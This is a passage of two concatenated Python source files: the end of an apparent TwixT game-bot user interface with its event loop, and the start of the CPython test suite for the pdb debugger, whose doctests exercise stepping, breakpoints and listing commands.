if event == ct.EVENT_SHORTCUT_TRIALS_2_PLUS:
return update_slider(2, min, ct.TRIALS_MAX, 1)
if event == ct.EVENT_SHORTCUT_TRIALS_2_MINUS:
return update_slider(2, max, 0, -1)
return False
def handle_event(self, event, values):
# menue events
if self.handle_menue_event(event, values):
return
# click on auto move or trials (no shortcuts)
if event in [ct.K_AUTO_MOVE[1], ct.K_AUTO_MOVE[2],
ct.K_TRIALS[1], ct.K_TRIALS[2]]:
# handle trials sliders, auto-move check and heatmap boxes
self.stgs.update(event, values)
self.update_bots()
return
# thread events
if event == ct.K_THREAD[1]:
# handle event sent from bot
self.handle_thread_event(values[ct.K_THREAD[1]])
return
# button events while bot is processing (Accept, Cancel)
if self.thread_is_alive():
self.handle_accept_and_cancel(event)
return
# keyboard shortcurt event (buttons and control bar)
if self.handle_shortcut_event(event, values):
return
# button events while bot is not processing
if self.handle_button_event(event, values):
return
# selection of mcts visualization
if event == ct.K_VISUALIZE_MCTS[1]:
self.update_bots()
return
# click on evaluation checkbox (no shortcuts)
if event == ct.K_SHOW_EVALUATION[1]:
self.update_evals()
return
# click on heatmap (no shortcuts)
if event == ct.K_HEATMAP[1]:
self.update_after_move()
return
# click on board event
if event == ct.K_BOARD[1]:
self.handle_board_click(values)
return
# other events go here...
self.logger.debug("event not handled: %s, %s", event, values)
def main():
# initialize settings from config.json
stgs = st.Settings()
# Init logging
logging.basicConfig(format=ct.LOG_FORMAT,
level=stgs.get(ct.K_LOG_LEVEL[1]))
# logger = logging.getLogger(ct.LOGGER)
# initialize game, pass "allow self crossing links" setting
game = twixt.Game(stgs.get(ct.K_ALLOW_SCL[1]))
# initialize twixt board (draw it later)
board = uiboard.UiBoard(game, stgs)
# initialize ui
ui = TwixtbotUI(game, stgs, board)
# Event Loop
while True:
if not ui.thread_is_alive():
if ui.ui_to_be_updated.is_set():
# thread has finished, we must update UI now
ui.update_after_move(False)
ui.get_control(ct.K_SPINNER).Update(visible=False)
ui.ui_to_be_updated.clear()
if ui.get_current(ct.K_AUTO_MOVE):
ui.bot_move()
event, values = ui.get_event()
if event == "__TIMEOUT__":
continue
elif event == sg.WIN_CLOSED or event == ct.EVENT_EXIT:
if ui.thread_is_alive():
ui.handle_cancel_bot()
ui.window.close()
break
ui.handle_event(event, values)
if __name__ == "__main__":
main()
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import codecs
import unittest
import subprocess
import textwrap
import linecache
from contextlib import ExitStack
from io import StringIO
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
from bdb import Breakpoint
def reset_Breakpoint():
Breakpoint.next = 1
Breakpoint.bplist = {}
Breakpoint.bpbynumber = [None]
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function4(a, b, c, /):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... test_function4(1, 2, 3)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'return', # return out of function
... 'next', # step to test_function4()
... 'step', # stepping to test_function4()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) return
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
-> pass
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
-> test_function4(1, 2, 3)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
-> def test_function4(a, b, c, /):
(Pdb) args
a = 1
b = 2
c = 3
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> reset_Breakpoint()
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def test_pdb_pp_repr_exc():
"""Test that do_p/do_pp do not swallow exceptions.
>>> class BadRepr:
... def __repr__(self):
... raise Exception('repr_exc')
>>> obj = BadRepr()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'p obj',
... 'pp obj',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_pp_repr_exc[2]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) p obj
*** Exception: repr_exc
(Pdb) pp obj
*** Exception: repr_exc
(Pdb) continue
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exit
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_pdb_whatis_command():
"""Test the whatis command
>>> myvar = (1,2)
>>> def myfunc():
... pass
>>> class MyClass:
... def mymethod(self):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'whatis myvar',
... 'whatis myfunc',
... 'whatis MyClass',
... 'whatis MyClass()',
... 'whatis MyClass.mymethod',
... 'whatis MyClass().mymethod',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_whatis_command[3]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) whatis myvar
<class 'tuple'>
(Pdb) whatis myfunc
Function myfunc
(Pdb) whatis MyClass
Class test.test_pdb.MyClass
(Pdb) whatis MyClass()
<class 'test.test_pdb.MyClass'>
(Pdb) whatis MyClass.mymethod
Function mymethod
(Pdb) whatis MyClass().mymethod
Method mymethod
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoint is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
